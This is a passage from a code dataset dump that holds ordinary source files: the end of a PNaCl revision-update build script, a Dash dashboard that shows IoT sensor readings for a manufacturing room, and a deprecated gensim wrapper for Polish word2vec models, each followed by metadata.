(tr_points_at['hash'], tr_points_at['date'])]))\n\n if not user_provided_hash:\n # Take the latest commit that touched PNaCl.\n new_pnacl_revision = pnacl_changes[-1]['hash']\n\n new_branch_name = 'pnacl-revision-update-to-%s' % new_pnacl_revision\n if GitBranchExists(new_branch_name):\n # TODO(jfb) Figure out if tryjobs succeeded, checkout the branch and land.\n raise Exception(\"Branch %s already exists, the change hasn't \"\n \"landed yet.\\nPlease check trybots and land it \"\n \"manually.\" % new_branch_name)\n\n if args.dry_run:\n DryRun(\"Would check out branch: \" + new_branch_name)\n DryRun(\"Would update PNaCl revision to: %s\" % new_pnacl_revision)\n else:\n GitCheckoutNewBranch(new_branch_name)\n try:\n SetCurrentRevision(new_pnacl_revision)\n for f in GetRevisionPackageFiles():\n GitAdd(f)\n GitCommit(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision))\n\n upload_res = UploadChanges()\n msg += ['Upload result:\\n%s' % upload_res]\n try_res = GitTry()\n msg += ['Try result:\\n%s' % try_res]\n\n GitCheckout(orig_branch, force=False)\n except:\n GitCheckout(orig_branch, force=True)\n raise\n\n Done(FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision, msg=msg))\n\n except SystemExit as e:\n # Normal exit.\n raise\n\n except (BaseException, Exception) as e:\n # Leave the branch around, if any was created: it'll prevent next\n # runs of the cronjob from succeeding until the failure is fixed.\n out = FmtOut(tr_points_at, pnacl_changes, new_pnacl_revision, msg=msg,\n err=['Failed at %s: %s' % (datetime.datetime.now(), e)])\n sys.stderr.write('%s\\n' % e)\n if not args.dry_run:\n SendEmail(args.email, out)\n raise\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(Main(sys.argv[1:]))\n", "repo_name": "kiwibrowser/src", "sub_path": "native_client/build/update_pnacl_tool_revisions.py", "file_name": "update_pnacl_tool_revisions.py", "file_ext": "py", "file_size_in_byte": 17277, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdout.write", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 32, "usage_type": "attribute"}, {"api_name": "getpass.getuser", "line_number": 68, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 93, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 95, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 101, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 107, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 137, "usage_type": "call"}, {"api_name": "re.search", "line_number": 181, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 212, "usage_type": "call"}, {"api_name": "re.search", "line_number": 242, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 254, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 254, "usage_type": "attribute"}, {"api_name": "email.mime.text.mime.text.MIMEText", "line_number": 255, "usage_type": "call"}, {"api_name": "email.mime.text.mime", "line_number": 255, "usage_type": "attribute"}, {"api_name": "email.mime.text", "line_number": 255, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 259, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 263, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 263, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 267, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 267, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 271, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 271, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 272, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 279, "usage_type": "call"}, {"api_name": "email.mime.text", "line_number": 316, "usage_type": "name"}, {"api_name": "re.match", "line_number": 319, "usage_type": "call"}, {"api_name": "email.mime.text", "line_number": 319, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 396, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 396, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 397, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 397, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 425, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 425, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 428, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 428, "usage_type": "name"}, {"api_name": "dateutil.parser.parse", "line_number": 431, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 431, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 480, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 480, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 481, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 481, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 490, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 490, "usage_type": "attribute"}]} +{"seq_id": "19138536222", "text": "from operator import index\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport numpy as np\nfrom dash.dependencies import Output, Input\nimport dash_daq as daq\nimport plotly.express as px\nimport ast \n\n#data pre-processing-------------------------------------------------------------------------------------------------------------------------\n\ndata = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\nmasterData = pd.read_csv(\"https://raw.githubusercontent.com/BhaskarTelecom/IOT/devAshwini/dataBase/masteDB.csv\")\n\n\na = np.linspace(20,25,646)\ntrial_column = pd.concat([data,pd.Series(a)],axis=1)\n\n\nmask = pd.notna(trial_column[\"SST0100\"])\nvalues = trial_column[\"SST0100\"][mask]\n\n\ntime = trial_column[\"time\"][mask]\ntime = pd.to_datetime(time)\n\n\nunitCountMask = pd.notna(data[\"SIR0100\"])\nunitCount = data[\"SIR0100\"][unitCountMask]\ntime1 = data[\"time\"][unitCountMask]\n\n\noutput = pd.DataFrame()\nfor item in unitCount:\n item = ast.literal_eval(item)\n output = output.append(item, ignore_index=True)\n\n\n\nx = pd.to_datetime(time1)\nx = pd.Series.to_frame(x)\n\nx.reset_index(drop=True, inplace=True)\n\ndf = pd.DataFrame()\noutput[\"Time\"] = x\n#print(output)\n\n#bar chart definition ---------------------------------------------------------------------------------------------------------------------\n#fig = px.bar(output,y=[\"True\",\"False\"],x=\"Time\",color_discrete_map={\"True\":\"green\",\"False\":\"red\"})\n#y=[output[\"True\"],output[\"False\"]],labels={output[\"True\"]:\"true\",output[\"False\"]:\"False\"}\n\n#web layout ---------------------------------------------------------------------------------------------------------------------------------\nexternal_stylesheets = [\n {\n \"href\": \"https://fonts.googleapis.com/css2?\"\n \"family=Lato:wght@400;700&display=swap\",\n \"rel\": \"stylesheet\",\n },\n { \"href\" : \"https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css\", \n \"rel\" : \"stylesheet\",\n \"integrity\" :\"sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC\",\n \"crossorigin\": \"anonymous\"\n },\n 'https://codepen.io/chriddyp/pen/bWLwgP.css'\n]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.title = \"Smart Manufacturing Systems!\"\n\napp.layout = html.Div([\n dcc.Interval(\n id='my-interval',\n disabled=False,\n interval=1*1000,\n n_intervals=0,\n max_intervals=-1\n ),\n html.Div(\n children=[\n html.P(children=\"🏭\", className=\"header-emoji\"),\n html.H1(\n children=\"Smart Manufacturing System\", className=\"header-title\"\n ),\n ],\n className=\"header\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n html.Div(children=\"Room\", className=\"menu-title\"),\n dcc.Dropdown(\n id=\"room-filter\",\n options=[\n {\"label\": \"Room 1\", \"value\": \"Room 1\"}\n \n ],\n value=\"Room 1\",\n clearable=False,\n className=\"dropdown\",\n ), \n ]\n ),\n html.Div(\n children=[\n html.Div(children=\"Type of Sensor\", className=\"menu-title\"),\n dcc.Dropdown(\n id=\"sensor-filter\",\n options=[\n {\"label\":sensorType , \"value\": sensorID}\n for (sensorType,sensorID) in [(\"Soldering Station Temp\",\"SST0100\"),(\"Pressure\",\"SPS0100\")]\n \n ],\n value=\"SST0100\",\n clearable=False,\n className=\"dropdown\",\n ), \n ]\n )\n ],\n className=\"menu\"\n ),\n html.Div(\n children=[\n html.Div(\n children=[\n html.Div(\n daq.Thermometer(\n id='my-thermometer',\n label=\"Room Temperature\",\n value=22,\n min=15,\n max=35,\n showCurrentValue=True,\n units=\"°C\",\n style={\n 'margin-bottom': '5%'\n },\n className=\"temp-widget\",\n )\n ),\n html.Div(\n daq.Gauge(\n id='my-gauge',\n label=\"Relative Room Humidity\",\n value=60,\n max=100,\n min=0,\n units=\"%\",\n showCurrentValue=True,\n className=\"gauge\",\n ), \n ), \n ],\n className=\"col-md-3 left-box\",\n ), \n html.Div(\n children=[\n html.Div(\n children=dcc.Graph(\n id=\"chart-1\",\n config={\"displayModeBar\": False},\n ),\n className=\"card\",\n ),\n html.Div(\n children=dcc.Graph(\n id=\"chart-2\",\n config={\"displayModeBar\": False},\n ),\n className=\"card\",\n ),\n ],\n className=\"col-md-6 wrapper\",\n ),\n html.Div(\n children=[\n html.Div(\n html.P(\n id=\"humidity-act\",\n children=['Humidity Actuator:']\n ),\n className=\"card right\" \n ),\n html.Div(\n html.P(\n id=\"temp-act\",\n children=['Temperature Actuator:']\n ),\n className=\"card right\" \n ),\n html.Div(\n html.P(\n id=\"osc-eqp\",\n children=['Oscillator Equipment:']\n ),\n className=\"card right\" \n ),\n html.Div(\n html.P(\n id=\"cb-eqp\",\n children=['init']\n ),\n className=\"card right\" \n ),\n html.Div(\n [\n html.H6(\"Test Bench\"),\n html.Table(\n id=\"tb-eqp\",\n children=[\"init\"],\n className=\"table table-striped table-hover\" \n )\n \n ],className=\"card right\"\n ),\n ], className=\"col-md-3 right-box\"\n )\n ],className=\"row\"\n ),\n ]\n)\n\n#------------------------------------------------------------------------------------------------------------------\n# Humidity Actuator\n\n@app.callback(\n Output(\"humidity-act\",\"children\"),\n Input('my-interval','n_intervals')\n)\n\ndef update_humidity_act_card(n_intervals):\n \n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n sensorID = 'AHA0100'\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Humidity Actuator: \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Temperature Actuator\n\n@app.callback(\n Output(\"temp-act\",\"children\"),\n Input('my-interval','n_intervals')\n)\n\ndef update_temp_act_card(n_intervals):\n \n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n sensorID = 'ARA0100'\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Temperature Actuator: \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Oscillator Equipment\n\n@app.callback(\n Output(\"osc-eqp\",\"children\"),\n Input('my-interval','n_intervals')\n)\ndef update_osc_card(n_intervals):\n \n sensorID = 'EOS0100'\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Oscilloscope: \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Test Bench Equipment\n\n@app.callback(\n Output(\"tb-eqp\",\"children\"),\n Input('my-interval','n_intervals')\n)\ndef update_test_bench_card(n_intervals):\n \n sensorID = 'ETB0100'\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n \n tb_mask = pd.notna(data[sensorID])\n test_bench_dict = ast.literal_eval(data[sensorID][tb_mask].iloc[-1])\n \n \n \n return [html.Table(\n [ \n html.Tr(\n [\n html.Th(\"Zero\"),\n html.Th(\"Span\"),\n ],className=\"text-center\"\n ),\n html.Tr(\n [\n html.Td(\"Voltage: \"+str(round(test_bench_dict[\"minValueVolt\"],2))+\"V\",className=\"text-center\"),\n html.Td(\"Voltage: \"+str(round(test_bench_dict[\"maxValueVolt\"],2))+\"V\",className=\"text-center\")\n ] \n ),\n html.Tr(\n [\n html.Td(\"Current: \"+str(round(test_bench_dict[\"minValueCurr\"],2))+\"mA\",className=\"text-center\"),\n html.Td(\"Current: \"+str(round(test_bench_dict[\"maxValueCurr\"],2))+\"mA\",className=\"text-center\")\n ]\n )\n ]\n )\n ]\n\n#------------------------------------------------------------------------------------------------------------------\n# Conveyor Belt\n\n@app.callback(\n Output(\"cb-eqp\",\"children\"),\n Input('my-interval','n_intervals')\n)\ndef update_conveyor_belt_card(n_intervals):\n \n sensorID = 'ECB0100'\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n temp_mask = pd.notna(data[sensorID])\n \n return [html.Span(\"Conveyor Belt : \"+data[sensorID][temp_mask].iloc[-1])]\n\n#------------------------------------------------------------------------------------------------------------------\n# Temperature Sensor\n\n@app.callback(\n Output('my-thermometer', 'value'),\n [Input('my-interval','n_intervals')]\n)\ndef update_thermometer(value):\n\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n temp_mask = pd.notna(data['SRT0100'])\n \n return data['SRT0100'][temp_mask].iloc[-1]\n\n#------------------------------------------------------------------------------------------------------------------\n# Humidity Sensor\n\n@app.callback(\n Output('my-gauge', 'value'),\n [Input('my-interval','n_intervals')]\n)\ndef update_gauge(value):\n\n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n humidity_mask = pd.notna(data[\"SHS0100\"])\n\n return data['SHS0100'][humidity_mask].iloc[-1]\n\n#------------------------------------------------------------------------------------------------------------------\n# Dropdown Sensor graph\n\n@app.callback(\n [Output(\"chart-1\",\"figure\"),\n Output(\"chart-2\",\"figure\")],\n [Input('my-interval','n_intervals'),\n Input('sensor-filter','value')]\n)\ndef update_graphs(figure,sensorID): \n \n data = pd.read_csv(\"/home/bhaskar/IOT/IOT/IOT-devAshwini/dataBase/room01DB.csv\")\n \n sensorMask = pd.notna(data[sensorID])\n \n real_time = data[\"time\"][sensorMask]\n real_time = pd.to_datetime(real_time)\n\n unitCountMask = pd.notna(data[\"SIR0100\"])\n unitCount = data[\"SIR0100\"][unitCountMask]\n\n time1 = data[\"time\"][unitCountMask]\n\n\n output = pd.DataFrame()\n for item in unitCount:\n item = ast.literal_eval(item)\n output = output.append(item, ignore_index=True)\n\n\n\n x = pd.to_datetime(time1)\n x = pd.Series.to_frame(x)\n\n x.reset_index(drop=True, inplace=True)\n\n df = pd.DataFrame()\n output[\"Time\"] = x\n\n if(sensorID==\"SST0100\"):\n sensor_graph_title = \"Soldering Station Temperature (°C)\"\n elif (sensorID == \"SPS0100\"):\n sensor_graph_title = \"Output Pressure Value (kg)\"\n \n sensorGraph = {\n \"data\": [\n {\n \"x\": real_time,\n \"y\": data[sensorID][sensorMask],\n \"type\": \"lines\",\n \"hovertemplate\": \"%{y:.2f}\",\n },\n ],\n \"layout\": {\n \"title\": {\n \"text\": sensor_graph_title,\n \"x\": 0.05,\n \"xanchor\": \"left\",\n },\n \"xaxis\": {\"fixedrange\": False},\n \"yaxis\": {\"ticksufix\": \"C\", \"fixedrange\": False},\n \"colorway\": [\"#17B897\"],\n },\n }\n\n fig = px.bar(output,y=[\"True\",\"False\"],x=\"Time\",color_discrete_map={\"True\":\"green\",\"False\":\"red\"})\n\n return sensorGraph,fig\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=False,port=5055)\n\n\n\n\n\n", "repo_name": "BhaskarTelecom/IOT", "sub_path": "dash/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 14646, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 35, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.Series.to_frame", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 69, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 73, "usage_type": "call"}, {"api_name": "dash_core_components.Interval", "line_number": 74, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 81, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 84, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 90, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 92, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 94, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 95, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 107, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 109, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 110, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 126, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 130, "usage_type": "call"}, {"api_name": "dash_daq.Thermometer", "line_number": 131, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 145, "usage_type": "call"}, {"api_name": "dash_daq.Gauge", "line_number": 146, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 160, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 162, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 163, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 169, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 170, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 179, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 181, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 182, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 188, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 189, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 202, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 203, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 209, "usage_type": "call"}, {"api_name": "dash_html_components.H6", "line_number": 211, "usage_type": "call"}, {"api_name": "dash_html_components.Table", "line_number": 212, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 237, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 239, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 241, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 231, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 232, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 255, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 257, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 247, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 248, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 269, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 270, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 272, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 263, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 264, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 284, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 286, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 287, "usage_type": "call"}, {"api_name": "dash_html_components.Table", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 293, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 295, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 296, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 299, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 301, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 302, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 305, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 307, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 308, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 278, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 325, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 326, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 328, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 319, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 320, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 335, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 353, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 354, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 348, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 349, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 371, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 374, "usage_type": "call"}, {"api_name": "pandas.notna", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 382, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 384, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 389, "usage_type": "call"}, {"api_name": "pandas.Series.to_frame", "line_number": 390, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 390, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 394, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 423, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 423, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 362, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 363, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 364, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 365, "usage_type": "call"}]} +{"seq_id": "37099698498", "text": "\"\"\"\nSince 6.11.2019 we do not use gensim so this is deprecated.\nIt is not deleted because of possibility of returning to this idea.\n\"\"\"\n\nimport os\nimport numpy as np\nimport gensim\nfrom deprecated import deprecated\nfrom scipy.spatial import distance\nfrom settings import DATA_PATH\nfrom tqdm import tqdm\n\n@deprecated(reason=\"Class is not finished because it is hard to convert dict to gensim.\")\nclass IpiPanModelGensim():\n \"\"\"\n DATA_PATH/models directory should contains saved models.\n Models are available to download on http://dsmodels.nlp.ipipan.waw.pl/.\n\n In contrast to IpiPanModel, this class requires binary Word2Vec binary models.\n\n Naming convention from IPI-PAN docs:\n Nazwa pliku: corpus-type-stype-dim-arch-alg.txt.gz\n corpus nazwa korpusu - nkjp, wiki lub nkjp+wiki\n type typ modelu - model oparty na formach (forms) lub lematach (lemmas)\n stype podtyp modelu - wszystkie części mowy (all) lub tylko wybrane części mowy (restricted)\n dim rozmiar wektora - 100 lub 300\n arch architektura sieci neuronowej - CBOW (cbow) lub Skip-Gram (skipg)\n alg algorytm uczący - Hierarchical Softmax (hs) lub Negative Sampling (ns)\n\n Niektóre modele ograniczone zostały tylko do tych słów, które wystąpiły co najmniej 30 lub 50 razy w korpusie.\n Jest to zaznaczone po nazwie algorytmu uczącego alg. it100 w nazwie pliku oznacza, że dany model został\n wytrenowany w stu iteracjach.\n \"\"\"\n def __init__(self, file_name):\n self.model = None\n self.load_model(file_name)\n\n def load_model(self, file_name):\n file_extension = os.path.splitext(file_name)[1]\n if file_extension == '.txt':\n self.load_model_from_raw_file(file_name)\n else:\n self.load_model_from_binary(file_name)\n\n def load_model_from_binary(self, file_name):\n file_path = os.path.join(DATA_PATH, os.path.join(\"models\", file_name))\n if not os.path.isfile(file_path):\n raise ValueError(\"File {} does not exists.\".format(file_path))\n self.model = gensim.models.KeyedVectors.load_word2vec_format(file_path, binary=True)\n\n def load_model_from_raw_file(self, file_name):\n self.load_raw_file(file_name)\n # embeddings = self.filter_model_with_polimorf(embeddings)\n print(len(self.word2vec_embeddings.keys()))\n self.model = gensim.models.keyedvectors.Word2VecKeyedVectors(len(self.word2vec_embeddings.keys()))\n self.model.vocab = self.word2vec_embeddings\n vectors = np.array(self.word2vec_embeddings.values())\n print(type(vectors))\n print(vectors.shape)\n self.model.vectors = vectors\n\n def load_raw_file(self, file_name):\n self.word2vec_embeddings = dict()\n file_path = os.path.join(DATA_PATH, os.path.join(\"models\", file_name))\n if not os.path.isfile(file_path):\n raise ValueError(\"File {} does not exists.\".format(file_path))\n f = open(file_path, \"r\")\n for x in f:\n x = x.replace(\"\\r\\n\", \"\\n\").replace(\"\\n\", \"\")\n x = x.split(\" \")\n if len(x) > 2: # skip first line\n self.word2vec_embeddings[x[0]] = np.array(x[1:], dtype=float)\n\n def filter_model_with_polimorf(self):\n vocabulary = self._get_vocabulary_from_polimorf()\n new_word2vec_dictionary = dict()\n print(\"Number of words in Word2Vec: {}\".format(len(self.word2vec_embeddings.keys())))\n for word, embedding in tqdm(self.word2vec_embeddings.items()):\n if word in vocabulary:\n new_word2vec_dictionary[word] = embedding\n return new_word2vec_dictionary\n\n def _get_vocabulary_from_polimorf(self):\n vocabulary = list()\n with open(os.path.join(DATA_PATH, \"PoliMorf-0.6.7.tab\"), 'r') as file:\n lines = file.readlines()\n for line in lines:\n words = line.split(\"\\t\")\n vocabulary.append(words[0])\n return vocabulary\n\n def get(self, word):\n \"\"\"\n Return embedding for a word.\n :param word:\n :return: numpy.ndarray with word embedding\n \"\"\"\n try:\n ret_val = self.model.get_vector(word)\n except:\n raise ValueError(\"Word {} is not avalaible in model.\".format(word))\n return ret_val\n\n def semantic_relatedness(self, word1, word2, dist_type='cosine'):\n v1 = self.get(word1)\n v2 = self.get(word2)\n dist_fun = self.__get_distance_function(dist_type)\n return dist_fun(v1, v2)\n\n def synonyms(self, word, top=10, dist_type='cosine'):\n dist_fun = self.__get_distance_function(dist_type)\n distances = {}\n for neighbour in self.model.vocab:\n distances[neighbour] = dist_fun(self.get(word), self.get(neighbour))\n sorted_dist = sorted(distances.items(), key=lambda kv: kv[1])\n closest = [sd[0] for sd in sorted_dist[:top]]\n return closest\n\n def __get_distance_function(self, dist_type='cosine'):\n if dist_type == 'euclidean':\n return distance.euclidean\n elif dist_type == 'manhattan':\n return distance.cityblock\n elif dist_type == \"cosine\":\n return distance.cosine\n\n def save_model(self, file_name):\n print(type(self.model.vocab))\n print(self.model.vectors.shape)\n file_path = os.path.join(DATA_PATH, file_name + \".bin\")\n self.model.save_word2vec_format(file_path, binary=True)\n\n", "repo_name": "lukaszsus/nlp-semantic-relatedness", "sub_path": "models/ipi_pan_model_gensim.py", "file_name": 